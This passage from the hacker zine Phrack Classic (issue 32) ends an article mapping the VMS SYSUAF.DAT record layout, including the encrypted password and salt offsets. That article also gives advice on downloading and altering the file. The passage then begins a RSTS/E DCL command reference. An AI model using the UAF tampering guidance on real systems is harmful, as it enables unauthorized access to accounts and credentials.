  3701.         DATA_RECORD_COUNT       4
  3702.         DATA_SPACE_OCCUPIED     2
  3703.         DEPTH                   1
  3704.         DUPLICATES_PER_SIDR     0
  3705.         INDEX_COMPRESSION       0
  3706.         INDEX_FILL              2
  3707.         INDEX_SPACE_OCCUPIED    2
  3708.         LEVEL1_RECORD_COUNT     1
  3709.         MEAN_DATA_LENGTH        15
  3710.         MEAN_INDEX_LENGTH       6
  3711.  
  3712. ANALYSIS_OF_KEY 2
  3713.         DATA_FILL               8
  3714.         DATA_KEY_COMPRESSION    0
  3715.         DATA_RECORD_COUNT       4
  3716.         DATA_SPACE_OCCUPIED     2
  3717.         DEPTH                   1
  3718.         DUPLICATES_PER_SIDR     0
  3719.         INDEX_COMPRESSION       0
  3720.         INDEX_FILL              2
  3721.         INDEX_SPACE_OCCUPIED    2
  3722.         LEVEL1_RECORD_COUNT     1
  3723.         MEAN_DATA_LENGTH        19
  3724.         MEAN_INDEX_LENGTH       10
  3725.  
  3726. ANALYSIS_OF_KEY 3
  3727.         ! This index is uninitialized - there are no records.
  3728.  
  3729. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  3730.  
  3731. Examination
  3732. ~~~~~~~~~~
  3733.  
  3734.         Generally, an interactive user would use the AUTHORIZE utility to
  3735. modify or examine the UAF, while a program would use the $GETUAI system
  3736. services (get user authorization information service) to examine the file.
  3737. The $GETUAI system services reference provide an excellent description of what
  3738. fields the UAF contains, and how many bytes are used within the file to store
  3739. each of those fields.  However, it may not be within your realm of skills to
  3740. program using system services.  It would probably be considerably easier to
  3741. use a sector editor/browser to locate values within the UAF.  You could use a
  3742. sector editor/browser online (such as VFE.EXE), or you you might choose to
  3743. download the UAF and use an editor/browse for your personal computer.
  3744. Regardless of which method you choose, you will have to know the offset of
  3745. each field within the user authorization file.  This is what I have provided
  3746. for you.
  3747.  
  3748.         The contents of the UAF under VMS release 5.3-1 are as follows:
  3749.  
  3750. Offset   Description                                            Length
  3751. -----------------------------------------------------------------------------
  3752.    0     Record Header                                             4
  3753.    4     Username (loginid)                                       32
  3754.   36     Member UIC - Mem UIC decimal   1 = 0100                   2
  3755.                       Mem UIC decimal  10 = 0A00
  3756.                       Mem UIC decimal 256 = FF01
  3757.  
  3758.   38     Group UIC  - Same as format as member UIC                 2
  3759.  
  3760.          Note:  UICs as displayed in the VMS environment
  3761.          are OCTAL.  A UIC of [010,001] would be saved as
  3762.          '01000800' in bytes 36-39 (offset).
  3763.  
  3764.   40     Nulls                                                    12
  3765.   52     Account name                                             32
  3766.   84     1 byte - value = length of owner                          1
  3767.   85     Owner                                                    31
  3768.  116     1 byte - value = length of device                         1
  3769.  117     Device (default disk device)                             31
  3770.  148     1 byte - length of default (SYS$LOGIN) directory          1
  3771.  149     Default (SYS$LOGIN) directory name                       63
  3772.  212     1 byte - length of default login command file             1
  3773.  213     Default login command file                               63
  3774.  276     1 byte - length of default CLI                            1
  3775.  277     Default command language interpeter                      31
  3776.  
  3777.          Note: CLI is assumed to be in SYS$SYSTEM directory
  3778.          and have an .EXE extension.
  3779.  
  3780.  308     1 byte - length of user defined CLI tables                1
  3781.  309     User defined CLI table name                              31
  3782.  340     Encrypted primary password                                8
  3783.  348     Encrypted secondary password                              8
  3784.  356     Number of login fails                                     2
  3785.  358     Password encryption salt                                  2
  3786.  360     Encryption algorithm code byte - primary password         1
  3787.  361     Encryption algorithm code byte - secondary password       1
  3788.  362     Password minimum length                                   1
  3789.  363     Filler (1 byte)                                           1
  3790.  364     Account expiration date                                   8
  3791.  372     Password lifetime                                         8
  3792.  380     Password change date/time - primary password              8
  3793.  388     Password change date/time - secondary password            8
  3794.  396     Last interactive login date/time                          8
  3795.  404     Last non-interactive login date/time                      8
  3796.  412     Authorize priviledges                                     8
  3797.  420     Default priviledges                                       8
  3798.  428     Filler (40 bytes)                                        40
  3799.  
  3800.  468     Login Flags bits as follows:                              4
  3801.  
  3802.            7  6  5  4  3  2  1  0
  3803.          -------------------------
  3804.          |  |  |  |  |  |  |  |  |
  3805.          -------------------------
  3806.  
  3807.          Byte Offset 468:
  3808.  
  3809.          Bit 0            - User can not use CTRL-Y
  3810.          Bit 1            - User is restricted to default
  3811.                             command interpeter
  3812.          Bit 2            - SET PASSWORD command is disabled
  3813.          Bit 3            - Prevent user from changing any
  3814.                             defaults at login
  3815.          Bit 4            - User account is disabled
  3816.          Bit 5            - User will not receive the login
  3817.                             welcome message
  3818.          Bit 6            - Announcement of new mail is suppressed
  3819.          Bit 7            - Mail delivery to user is disabled
  3820.  
  3821.          Byte Offset 469:
  3822.  
  3823.          Bit 0            - User is required to use generated
  3824.                             passwords
  3825.          Bit 1            - Primary password is expired
  3826.          Bit 2            - Secondary password is expired
  3827.          Bit 3            - All actions are audited
  3828.          Bit 4            - User will not receive last login
  3829.                             messages
  3830.          Bit 5            - User can not reconnect to existing
  3831.                             processes
  3832.          Bit 6            - User can only login to terminals
  3833.                             defined by the automatic login
  3834.                             facility (ALF)
  3835.          Bit 7            - User is required to change expired
  3836.                             passwords
  3837.  
  3838.          Byte Offset 470:
  3839.  
  3840.          Bit 0            - User is restricted to captive account
  3841.          Bit 1            - Prevent user from executing RUN, MCR
  3842.                             commands, or foreign commands at the
  3843.                             DCL level
  3844.          Bits 2-7         - Reserved for future use
  3845.  
  3846.          Byte Offset 471:
  3847.  
  3848.          Bits 0-7         - Reserved for future use
  3849.  
  3850.  
  3851.          Note On Access Bytes:
  3852.  
  3853.          Each bit set represents a 1-hour period, from bit 0 as
  3854.          midnight to 1 a.m. to bit 23 as 11 p.m. to midnight.
  3855.  
  3856.  472     Network access bytes - primary days                       3
  3857.  475     Network access bytes - seconday days                      3
  3858.  478     Batch access bytes - primary days                         3
  3859.  481     Batch access bytes - seconday days                        3
  3860.  484     Local access bytes - primary days                         3
  3861.  487     Local access bytes - seconday days                        3
  3862.  490     Dialup access bytes - primary days                        3
  3863.  493     Dialup access bytes - secondary days                      3
  3864.  496     Remote access bytes - primary days                        3
  3865.  499     Remote access bytes - seconday days                       3
  3866.  
  3867.  502     Filler (12 bytes)                                        12
  3868.  514     Prime days                                                1
  3869.  
  3870.          Bits 0-7 toggled on represents primedays, respective
  3871.          to Mon, Tue, ..., Sun.
  3872.  
  3873.  515     Filler (1 byte)                                           1
  3874.  516     Default base priority                                     1
  3875.  517     Maximum job queue priority                                1
  3876.  518     Active process limit                                      2
  3877.  520     Max. number of interactive, detached, and batch jobs      2
  3878.  524     Detached process limit                                    2
  3879.  526     Subprocess creation limit                                 2
  3880.  528     Buffered I/O count                                        2
  3881.  530     Timer queue entry limit                                   2
  3882.  532     AST queue limit                                           2
  3883.  534     Lock queue limit                                          2
  3884.  536     Open file limit                                           4
  3885.  538     Shared file limit                                         2
  3886.  540     Working set quota                                         4
  3887.  548     Working set extent                                        4
  3888.  552     Paging file quota                                         4
  3889.  556     Maximum CPU time limit (in 10-milliseconds)               4
  3890.  560     Buffered I/O byte limit                                   4
  3891.  564     Paged buffer I/O byte count limit                         4
  3892.  568     Initial byte quota (jobwide logical name table uses)      4
  3893.  572     Filler (72 bytes)                                        72
  3894.  
  3895.         Dates and times are stored as 8 bytes representing the number of
  3896. seconds elapsed since November 17, 1858, 12:00:00 a.m.
  3897.  
  3898.         Earlier versions of the VMS UAF will contain much of the same data,
  3899. which should be at the same offset as listed above.
  3900.  
  3901.  
  3902.         Should you decide to attempt to modify the SYSUAF.DAT file, keep in
  3903. mind that if you download the file, when you upload it, it will not be the
  3904. same as it was before; it will not be an indexed file.  You *might* be able
  3905. to create an .FDL file (using ANALYZE/RMS/FDL SYSUAF.DAT), and use that .FDL
  3906. file to convert it back to an indexed file
  3907. (with CONVERT/FDL=SYSUAF.FDL UPLOAD_UAF.DAT NEW_UAF.DAT), but chances that it
  3908. will contain the proper indexing and file attributes are slim.  Remember when
  3909. altering the SYSUAF.DAT file to keep a copy around (on the system) in case
  3910. you need to repair the damage.
  3911.  
  3912.  
  3913. -PHz
  3914.  
  3915. Feel free to make any comments or corrections to the following address:
  3916.  
  3917. [phz@judy.indstate.edu]
  3918. _______________________________________________________________________________
  3919.  
  3920.                               ==Phrack Classic==
  3921.  
  3922.                      Volume Three, Issue 32, File #9 of 12
  3923.  
  3924.  
  3925.                           /-?!?!?!?!?!?!?!?!?!?!?!-\
  3926.                          /EZ?!                  ?!AH\
  3927.                         /APE?!                  ?!ZAP\
  3928.                        /AZHP?!      RSTS/E      ?!EZHA\
  3929.                       / ZEAH?!                  ?!PEAZ \
  3930.                  [*>RSTS PZA?!        by        ?!HPZ LIVES<*]
  3931.                       \ PHEZ?!                  ?!AHEE /
  3932.                        \HAPE?!   Crimson Death  ?!ZAPP/
  3933.                         \ZHP?!                  ?!EZH/
  3934.                          \AH?!                  ?!PE/
  3935.                           \-?!?!?!?!?!?!?!?!?!?!?!-/
  3936.  
  3937.  
  3938. Ok, ok... Just what you wanted... a file of RSTS!!! Hah...
  3939. Well.. One would be suprised on how many RSTS systems are still around
  3940. on variuos X.25 networks, not to mention they are soooo much fun!
  3941. Here is a little list of some various commands that is good to keep
  3942. lying around just to use as a reference of just for you nostaglic type
  3943. people like me.  So enjoy, and if you were never involved in hacking
  3944. when RSTS was popular, you really missed something.
  3945. -------------------------------------------------------------------------------
  3946.  
  3947. *ALLOCATE
  3948. The ALLOCATE command reserves a physical device for your use during
  3949. the current session and optionally establishes a logical name for
  3950. the device. Once a device has been allocated, other users cannot access
  3951. the device until you specifically deallocate it or log out.  You can
  3952. allocate a device only when it is not allocated by another job.
  3953.  
  3954. Format
  3955.  
  3956. ALLOCATE device-name[:] [logical-name[:]]
  3957.  
  3958. Prompts
  3959.  
  3960. Device: device-name
  3961.  
  3962. See also:  ASSIGN, DEALLOCATE
  3963.  
  3964. *APPEND
  3965. The APPEND command adds the contents of one or more files to the end
  3966. of the file you specify. APPEND is similar in syntax and function to
  3967. the COPY command.
  3968.  
  3969. Format
  3970.  
  3971. APPEND [node::]input-file-spec[,...]  [node::]output-file-spec
  3972.  
  3973. Command Qualifiers                  Defaults
  3974.  
  3975.    /[NO]LOG                         /LOG
  3976.    /[NO]QUERY                       /NOQUERY
  3977.  
  3978. Prompts
  3979.  
  3980. From: input-file-spec[,...]
  3981.  
  3982. To: output-file-spec
  3983.  
  3984. See also:  COPY
  3985.  
  3986. *ASSIGN
  3987. The ASSIGN command lets you relate a logical name to a directory
  3988. or to a physical device.  The names you ASSIGN stay in effect until
  3989. you log out, or log into another account or until you DEASSIGN the name.
  3990.  
  3991. Format
  3992.  
  3993. ASSIGN device-name:[[ppn]] logical-name[:]
  3994.  
  3995. Prompts
  3996.  
  3997. Device: device-name:[[ppn]]
  3998.  
  3999. Logical name: logical-name[:]
  4000.  
  4001. *BASIC
  4002. The BASIC command invokes the BASIC-PLUS or BASIC-PLUS-2 programming
  4003. environment, depending on the qualifiers you use and the system's
  4004. default. It also prepares RSTS/E for the development of BASIC programs.
  4005.  
  4006. Format
  4007.  
  4008. BASIC
  4009.  
  4010. Command Qualifiers                  Comments
  4011.  
  4012.    /BP2                             Invokes the BASIC-PLUS-2
  4013.                                     programming environment
  4014.    /BPLUS                           Invokes the BASIC-PLUS
  4015.                                     programming environment
  4016.  
  4017. All subsequent commands are interpreted as BASIC programming commands,
  4018. until you type the following command to return to the DCL keyboard
  4019. monitor:  DCL <ret>
  4020.  
  4021. *CCL
  4022. Format
  4023.  
  4024. CCL ccl-command
  4025.  
  4026. The Concise Command Language (CCL) allows you to enter a command name
  4027. rather than type RUN and a program name.
  4028.  
  4029. You can type CCL commands directly after DCL's dollar prompt ($).
  4030. The format of the CCL command is defined by your system manager.
  4031. For details about the use of a CCL command, refer to the
  4032. documentation written for your site.
  4033.  
  4034. When you are using the DCL Keyboard Monitor, DCL commands take
  4035. precedence over CCL commands.  If your system manager gives a CCL
  4036. command the same name as a DCL command, you must type the prefix
  4037. "CCL" a space, and the CCL command itself.
  4038.  
  4039. For example, a CCL command name "DIRECTORY" and the DCL command
  4040. "DIRECTORY" may produce different results depending on how the CCL
  4041. command works at your site.  To use the CCL version, type:
  4042.     $  CCL DIRECTORY <ret>
  4043.  
  4044. *COBOL
  4045. The COBOL command compiles a COBOL-81 program.  (Only one source file at a
  4046. time can be compiled with COBOL-81.)
  4047.  
  4048.  
  4049. Format:
  4050.  
  4051. COBOL file-spec
  4052.  
  4053. Qualifiers                        Defaults
  4054.  
  4055.    /[NO]ANSI_FORMAT
  4056.    /[NO]CHECK
  4057.    /[NO]CROSS_REFERENCE
  4058.    /LIST[=listfile]               /NOLIST
  4059.    /NOLIST
  4060.    /[NO]MAP
  4061.    /NAMES=aa                      /NAMES=SC
  4062.    /OBJECT[=objfile]              /OBJECT
  4063.    /NOOBJECT
  4064.  
  4065. Prompts
  4066.  
  4067. File:  file-spec
  4068.  
  4069. See also:  LINK
  4070.  
  4071. *COPY
  4072. The COPY command duplicates one or more existing files.
  4073. You can use COPY to:
  4074.  
  4075. - copy one file to another file
  4076. - merge (concatenate) more than one file into a single file
  4077. - copy a group of files to another group of files
  4078.  
  4079. Format
  4080.  
  4081. COPY [node::]input-file-spec[,...]  [node::]output-file-spec
  4082.  
  4083. Qualifiers                          Defaults
  4084.  
  4085.    /ALLOCATION=n
  4086.    /[NO]CONTIGUOUS       (N)
  4087.    /[NO]LOG              (N)        /LOG
  4088.    /[NO]OVERLAY                     /NOOVERLAY
  4089.    /PROTECTION=n
  4090.    /[NO]QUERY            (N)        /NOQUERY
  4091.    /[NO]REPLACE          (N)        /NOREPLACE
  4092.  
  4093. (N) denotes a qualifier that you can use in network operations.
  4094.  
  4095. Prompts
  4096.  
  4097. From: input-file-spec[,...]
  4098.  
  4099. To: output-file-spec
  4100.  
  4101. *CREATE
  4102. The CREATE command allows you to enter text and save it as a file.
  4103.  
  4104. Format
  4105.  
  4106. CREATE file-spec
  4107.  
  4108. Prompts
  4109.  
  4110. File: file-spec
  4111.  
  4112. Once you have entered the file-spec, press RETURN and you may start
  4113. typing text.  Press <CTRL/Z> when you have finished entering text.
  4114.  
  4115. Command Qualifiers
  4116.  
  4117.    /ALLOCATION=n
  4118.    /[NO]CONTIGUOUS
  4119.    /PROTECTION=n
  4120.    /[NO]REPLACE
  4121.  
  4122. See also:  EDIT
  4123.  
  4124. *DEALLOCATE
  4125. The DEALLOCATE command releases a device that you reserved for private
  4126. use, so that other users may have access to it. (However, DEALLOCATE
  4127. does not deassign any logical name you may have set up for the device.)
  4128.  
  4129. Format
  4130.  
  4131. DEALLOCATE device-name[:]
  4132.  
  4133. Command Qualifiers                  Defaults
  4134.  
  4135.    /ALL                             none
  4136.  
  4137. Prompts
  4138.  
  4139. Device: device-name[:]
  4140.  
  4141. See also:  ALLOCATE
  4142.  
  4143. *DEASSIGN
  4144. The DEASSIGN command cancels logical name assignments you made with
  4145. the ASSIGN or ALLOCATE commands.
  4146.  
  4147. Format
  4148.  
  4149. DEASSIGN [logical-name[:]]
  4150.  
  4151. Command Qualifiers                  Defaults
  4152.  
  4153.    /ALL
  4154.  
  4155. Prompts
  4156.  
  4157. Logical name: logical-name[:]
  4158.  
  4159. See also:  ASSIGN, DEALLOCATE
  4160.  
  4161. *DELETE/ENTRY
  4162. The DELETE/ENTRY command deletes jobs from the queue that have not
  4163. yet begun processing or jobs that are currently being processed.
  4164.  
  4165. Format
  4166.  
  4167. DELETE/ENTRY=job-number [queue-name[:]]
  4168.  
  4169. Command Qualifiers                  Defaults
  4170.  
  4171.    /BATCH
  4172.  
  4173. Prompts
  4174.  
  4175. Queue: queue-name[:]
  4176.  
  4177. If you do not specify a queue name, LP0: is assumed.
  4178.  
  4179. See also:  PRINT, SUBMIT, DELETE/JOB, SET QUEUE/ENTRY
  4180.  
  4181. *DELETE/JOB
  4182.  
  4183. The DELETE/JOB command uses the name of a job to cancel a request
  4184. to the print or batch queue.
  4185.  
  4186. Format
  4187.  
  4188. DELETE/JOB=job-name [queue-name[:]]
  4189.  
  4190. Command Qualifiers                  Defaults
  4191.  
  4192.    /BATCH
  4193.  
  4194. For example, if you decide after you make your print request that you
  4195. do not want a hard copy of the file after all, you can use the
  4196. DELETE/JOB command to withdraw your request.  (If the file is printed
  4197. before you enter the DELETE/JOB command, your request is too late.
  4198. However, it works if your file is in the middle of printing: the file
  4199. stops printing.)
  4200.  
  4201. See also:  PRINT, SUBMIT, DELETE/ENTRY, SET QUEUE/JOB
  4202.  
  4203. *DELETE
  4204. The DELETE command permanently removes a file from your account.
  4205.  
  4206. Format
  4207.  
  4208. DELETE [node::]file-spec[,...]
  4209.  
  4210. Command Qualifiers                 Defaults
  4211.  
  4212.    /BEFORE=date
  4213.    /CREATED                        /CREATED
  4214.    /[NO]LOG                        /LOG
  4215.    /MODIFIED
  4216.    /[NO]QUERY                      /NOQUERY
  4217.    /SINCE=date
  4218.  
  4219. Prompts
  4220.  
  4221. File: [node::]file-spec[,...]
  4222.  
  4223. *DIBOL
  4224.  
  4225. The DIBOL command compiles a DIBOL-11 program.  You can include up to
  4226. six source file specifications to be compiled into a single object
  4227. file with the DIBOL compiler.
  4228.  
  4229. Format
  4230.  
  4231. DIBOL filespec[,...]
  4232.  
  4233. File Qualifiers                  Defaults
  4234.  
  4235.    /LIST[=listfile]              /NOLIST
  4236.    /NOLIST
  4237.    /OBJECT[=objfile]             /OBJECT
  4238.    /NOOBJECT
  4239.    /WARNINGS                     /WARNINGS
  4240.    /NOWARNINGS
  4241.  
  4242. See also:  LINK
  4243.  
  4244. *DIFFERENCES
  4245. The DIFFERENCES command compares two files and lists any sections
  4246. of text that differ between the two files.
  4247.  
  4248. Format
  4249.  
  4250. DIFFERENCES input-file-spec  compare-file-spec
  4251.  
  4252. Command Qualifiers                  Defaults
  4253.  
  4254.    /IGNORE=BLANKLINES
  4255.    /MATCH=size                      /MATCH=3
  4256.    /MAXIMUM_DIFFERENCES=n
  4257.    /OUTPUT[=file-spec]
  4258.  
  4259. Prompts:
  4260.  
  4261. File 1: input-file-spec
  4262.  
  4263. File 2: compare-file-spec
  4264.  
  4265. *DIRECTORY
  4266. The DIRECTORY command displays information about files.
  4267. Use the TYPE command to display the contents of individual files.
  4268.  
  4269. Format
  4270.  
  4271. DIRECTORY [node::][file-spec[,...]]
  4272.  
  4273. Command Qualifiers                  Defaults
  4274.  
  4275.    /BEFORE=date
  4276.    /BRIEF                           /BRIEF
  4277.    /CREATED                         /CREATED
  4278.    /DATE[=CREATED]                  /NODATE
  4279.         [=MODIFIED]
  4280.         [=ALL]
  4281.    /NODATE
  4282.    /FULL                            /BRIEF
  4283.    /MODIFIED                        /CREATED
  4284.    /OUTPUT=outfile
  4285.    /[NO]PROTECTION                  /PROTECTION
  4286.    /SINCE=date
  4287.    /SIZE[=ALLOCATION]               /SIZE=USED
  4288.         [=USED]
  4289.    /NOSIZE
  4290.    /TOTAL
  4291.  
  4292.  
  4293. *DISMOUNT
  4294. Releases a disk or tape previously accessed with a MOUNT command.
  4295. You issue this command before you take the drive off line, or before
  4296. you physically dismount the tape or disk.
  4297.  
  4298. The DISMOUNT command deallocates the device if it was allocated to
  4299. you.  (On some systems, dismounting a disk requires privileges.)
  4300. You cannot DISMOUNT a device if there are open files on it.  If you
  4301. try, RSTS/E displays the message:
  4302.  
  4303. ?Account or device in use
  4304.  
  4305. Format
  4306.  
  4307. DISMOUNT  device-name[:] [label]
  4308.  
  4309. Prompts
  4310.  
  4311. Device:  device-name[:]
  4312.  
  4313. See also:  MOUNT, DEALLOCATE
  4314.  
  4315. *EDIT
  4316. The EDIT command starts the EDT editor program, which lets
  4317. you create and edit text files.
  4318.  
  4319. Format
  4320.  
  4321. EDIT file-spec
  4322.  
  4323. Command Qualifiers                  Defaults
  4324.  
  4325.    /COMMAND[=file-spec]             /COMMAND=EDTINI.EDT
  4326.    /NOCOMMAND                       /COMMAND=EDTINI.EDT
  4327.    /JOURNAL[=file-spec]             /JOURNAL
  4328.    /NOJOURNAL                       /JOURNAL
  4329.    /OUTPUT[=outfile]                /OUTPUT
  4330.    /NOOUTPUT                        /OUTPUT
  4331.    /[NO]READ_ONLY                   /NOREAD_ONLY
  4332.    /[NO]RECOVER                     /NORECOVER
  4333.    /EDT                             /EDT
  4334.  
  4335. Prompts
  4336.  
  4337. File: file-spec
  4338.  
  4339. *FORTRAN
  4340. The FORTRAN command compiles up to six FORTRAN source files into
  4341. a single object file.
  4342.  
  4343. There are three FORTRAN compilers available on RSTS/E:
  4344.  
  4345.   Command               Invokes
  4346.  
  4347. FORTRAN/FOR            FORTRAN-IV
  4348. FORTRAN/F4P            FORTRAN-IV-PLUS
  4349. FORTRAN/F77            FORTRAN-77
  4350.  
  4351. FORTRAN/F77 is the default, unless your system manager has changed it.
  4352.  
  4353. Qualifiers which you may use with FORTRAN-IV are as follows:
  4354.  
  4355. Format
  4356.  
  4357. FORTRAN/FOR file-spec[,...]
  4358.  
  4359. Command Qualifiers
  4360.  
  4361.    /CODE:EAE
  4362.          EIS
  4363.          FIS
  4364.          THR
  4365.    /[NO]D_LINES
  4366.    /[NO]I4
  4367.    /[NO]LINENUMBERS
  4368.    /LIST[=listfile]
  4369.    /NOLIST
  4370.    /[NO]MACHINE_CODE
  4371.    /OBJECT[=objfile]
  4372.    /NOOBJECT
  4373.    /[NO]OPTIMIZE
  4374.    /[NO]WARNINGS
  4375.  
  4376. Qualifiers which you may use with FORTRAN-IV-PLUS or FORTRAN-77
  4377. are as follows:
  4378.  
  4379. Format
  4380.  
  4381. FORTRAN/F4P file-spec[,...]   or FORTRAN/F77 file-spec[,...]
  4382.  
  4383. Command Qualifiers                 Defaults
  4384.  
  4385.    /[NO]CHECK                      /CHECK
  4386.    /CONTINUATIONS=n                /CONTINUATIONS=19
  4387.    /[NO]D_LINES                    /NOD_LINES
  4388.    /[NO]I4                         /NO14
  4389.    /LIST[=listfile]                /NOLIST
  4390.    /NOLIST
  4391.    /[NO]MACHINE_CODE               /NOMACHINE_CODE
  4392.    /OBJECT[=objfile]               /OBJECT
  4393.    /NOOBJECT
  4394.    /[NO]WARNINGS                   /WARNINGS
  4395.    /WORK_FILES=n                   /WORK_FILES=2
  4396.  
  4397. Prompts
  4398.  
  4399. File:   file-spec[,...]
  4400.  
  4401. See also:  LINK
  4402.  
  4403. *HELP
  4404. Help can be obtained on a particular topic by typing:
  4405.  
  4406.      HELP topic subtopic subsubtopic
  4407.  
  4408. A topic can have the following format:
  4409.  
  4410. 1) An alphanumeric string (e.g. a command name, option, etc.)
  4411. 2) Same preceded by a "/"
  4412. 3) The match-all symbol "*"
  4413.  
  4414. Example:
  4415.  
  4416. HELP COPY
  4417.  
  4418. The RSTS/E DCL User's Guide contains a complete description of all
  4419. DCL commands supported on RSTS/E.
  4420.  
  4421. *INITIALIZE
  4422. Deletes any data on a tape and writes a new label.
  4423.  
  4424. The INITIALIZE command allocates the tape drive if it is not
  4425. already allocated.
  4426.  
  4427. Format
  4428.  
  4429. INITIALIZE device-name[:] [label]
  4430.  
  4431. Qualifiers
  4432.  
  4433.    /FORMAT=ANSI
  4434.    /FORMAT=DOS
  4435.    /DENSITY=nnn
  4436.  
  4437. Prompts
  4438.  
  4439.    Device:  magtape[:]
  4440.    Label:   [label]
  4441.  
  4442. See also:  MOUNT, DISMOUNT
  4443.  
  4444. *LINK
  4445. The LINK command links together object files to produce an
  4446. executable program.  You can also specify an overlay structure
  4447. for the program.
  4448.  
  4449. Format
  4450.  
  4451. LINK file-spec[,...]
  4452.  
  4453. Language Qualifiers                  Comments
  4454.  
  4455. Only one of the following may be specified:
  4456.  
  4457.    /BASIC or /BP2                   BASIC-PLUS-2
  4458.    /COBOL or /C81                   COBOL-81
  4459.    /DIBOL
  4460.    /F4P                             FORTRAN-IV-PLUS
  4461.    /F77                             FORTRAN-77
  4462.    /FORTRAN                         FORTRAN-IV
  4463.    /RT11                            MACRO/RT11
  4464.  
  4465. If no language qualifier is specified, /BASIC (for BASIC-PLUS-2)
  4466. is assumed, unless your system manager has changed the default.
  4467.  
  4468.     Additional
  4469. Command Qualifiers                  Defaults
  4470.  
  4471.    /EXECUTABLE[=file-spec]          /EXECUTABLE
  4472.    /NOEXECUTABLE
  4473.    /[NO]FMS                         /NOFMS
  4474.    /MAP[=file-spec]                 /NOMAP
  4475.    /NOMAP
  4476.    /STRUCTURE
  4477.    /[NO]DMS                         /NODMS
  4478.  
  4479. Prompts
  4480.  
  4481. Files: file-spec
  4482.  
  4483. If /STRUCTURE was specified, you will be
  4484. prompted for the names of the input files
  4485. and overlay structure to use, e.g.,
  4486.  
  4487. ROOT files:  file-spec[,...]
  4488. Root PSECTs: [PSECT-name[,...]]
  4489. Overlay:     [file-spec[,...][+]]
  4490.  
  4491. You can specify /STRUCTURE if the program is written in
  4492. BASIC-PLUS-2, DIBOL, FORTRAN-IV-PLUS, or FORTRAN-77.  You
  4493. cannot specify /STRUCTURE if the program is written in
  4494. COBOL, FORTRAN-IV, or MACRO/RT11.
  4495.  
  4496. See also:  COBOL, DIBOL, BASIC, MACRO, FORTRAN
  4497.  
  4498. *LOGOUT
  4499. The LOGOUT command ends your session at the terminal.
  4500.  
  4501. Format
  4502.  
  4503. [LO]GOUT
  4504.  
  4505. Command Qualifiers
  4506.  
  4507.    /BRIEF
  4508.    /FULL (default)
  4509.  
  4510. If you include the /BRIEF qualifier after the LOGOUT command,
  4511. RSTS/E ends your session at the terminal without displaying a
  4512. message.  If you include the /FULL, or simply type LOGOUT, RSTS/E
  4513. displays information about the status of your account.
  4514.  
  4515. *MACRO
  4516. Invokes a MACRO-11 assembler.  You can include up to six file
  4517. specifications with the MACRO command.
  4518.  
  4519. On RSTS/E you can use either MACRO/RT11 or MACRO/RSX11.  The default
  4520. is MACRO/RSX11 unless your system manager has changed it.
  4521.  
  4522. Format
  4523.  
  4524. MACRO/RT11 filespec[,...]
  4525.  
  4526.         OR
  4527.  
  4528. MACRO/RSX11 filespec[,...]
  4529.  
  4530. Command Qualifiers
  4531.  
  4532.    /LIST[=listfile]
  4533.    /NOLIST
  4534.    /OBJECT[=objfile]
  4535.    /NOOBJECT
  4536.  
  4537. File Qualifiers
  4538.  
  4539.    /LIBRARY
  4540.  
  4541. See also:   LINK
  4542.  
  4543. *MOUNT
  4544. The MOUNT command prepares a tape or disk for processing by system
  4545. commands or user programs. (You do not always have to MOUNT a tape
  4546. before using it.) On some systems, mounting a disk requires privilege.
  4547.  
  4548. Format
  4549.  
  4550. MOUNT device-name[:] [label]
  4551.  
  4552. Command Qualifiers                  Defaults
  4553.  
  4554.    /[NO]WRITE                       /WRITE
  4555.  
  4556. Qualifiers for Tapes                Defaults
  4557.  
  4558.    /FORMAT=ANSI
  4559.    /FORMAT=DOS
  4560.    /FORMAT=FOREIGN
  4561.    /DENSITY=nnn
  4562.  
  4563. Prompts
  4564.  
  4565. Device: device-name[:]
  4566. Label: volume-label
  4567.  
  4568. See also:  DISMOUNT, INITIALIZE, ALLOCATE
  4569.  
  4570. *PRINT
  4571. The PRINT command queues a file for printing, either on a default
  4572. system printer or on a device you specify. A queue is the list of
  4573. files to be printed.
  4574.  
  4575. Format
  4576.  
  4577. PRINT file-spec[,...]
  4578.  
  4579. Command Qualifiers                  Defaults
  4580.  
  4581.    /AFTER=date-time
  4582.    /FORMS=type                      /FORMS=NORMAL
  4583.    /JOB_COUNT=n                     /JOB_COUNT=1
  4584.    /NAME=job-name
  4585.    /PRIORITY=n
  4586.    /QUEUE=queue-name[:]             /QUEUE=LP0:
  4587.  
  4588. File Qualifiers                     Defaults
  4589.  
  4590.    /COPIES=n                        /COPIES=1
  4591.    /[NO]DELETE                      /NODELETE
  4592.  
  4593. Prompts
  4594.  
  4595. File: file-spec[,...]
  4596.  
  4597. See also:  DELETE/JOB, SET QUEUE/JOB
  4598.  
  4599. *RENAME
  4600. The RENAME command changes the file name or file type of an
  4601. existing file.
  4602.  
  4603. Format
  4604.  
  4605. RENAME old-file-spec[,...]  new-file-spec
  4606.  
  4607. Qualifiers                    Defaults
  4608.  
  4609.    /[NO]LOG                   /LOG
  4610.    /[NO]QUERY                 /NOQUERY
  4611.    /[NO]REPLACE               /NOREPLACE
  4612.    /PROTECTION=n              /PROTECTION=60
  4613.  
  4614. Prompts
  4615.  
  4616. From: input-file-spec[,...]
  4617.  
  4618. To: output-file-spec
  4619.  
  4620. See also:  COPY, DELETE
  4621.  
  4622. *REQUEST
  4623. The REQUEST command displays a message at a system operator's terminal.
  4624.  
  4625. Format
  4626.  
  4627. REQUEST message-text
  4628.  
  4629. When you use the REQUEST command to send a message to an operator,
  4630. the message is displayed at the operator services console.
  4631.  
  4632. *RUN
  4633.  
  4634. The RUN command runs an executable file.
  4635.  
  4636. Format
  4637.  
  4638. RUN file-spec
  4639.  
  4640. Prompts
  4641.  
  4642. Program:  file-spec
  4643.  
  4644. *SET HOST
  4645. The SET HOST command lets you log into another computer from the
  4646. system you first logged into.
  4647.  
  4648. Format
  4649.  
  4650. SET HOST node[::]
  4651.  
  4652. Prompts
  4653.  
  4654. Node: node-name
  4655.  
  4656. *SET PROTECTION
  4657. The SET PROTECTION command specifies the protection code of a file.
  4658. You assign a protection code to determine who else, if anyone, can
  4659. have access to your files.
  4660.  
  4661. Format
  4662.  
  4663. SET PROTECTION[=n] [file-spec,...]
  4664.  
  4665. Qualifiers
  4666.  
  4667.    /DEFAULT
  4668.    /[NO]QUERY
  4669.    /[NO]LOG
  4670.  
  4671. Prompts
  4672.  
  4673. Protection code:  n
  4674. Files:  file-spec
  4675.  
  4676. If you use SET PROTECTION/DEFAULT, RSTS/E assigns the protection
  4677. code you specify to all files you create during the current session.
  4678. However, do not include a file specification when you use
  4679. the /DEFAULT qualifier.
  4680.  
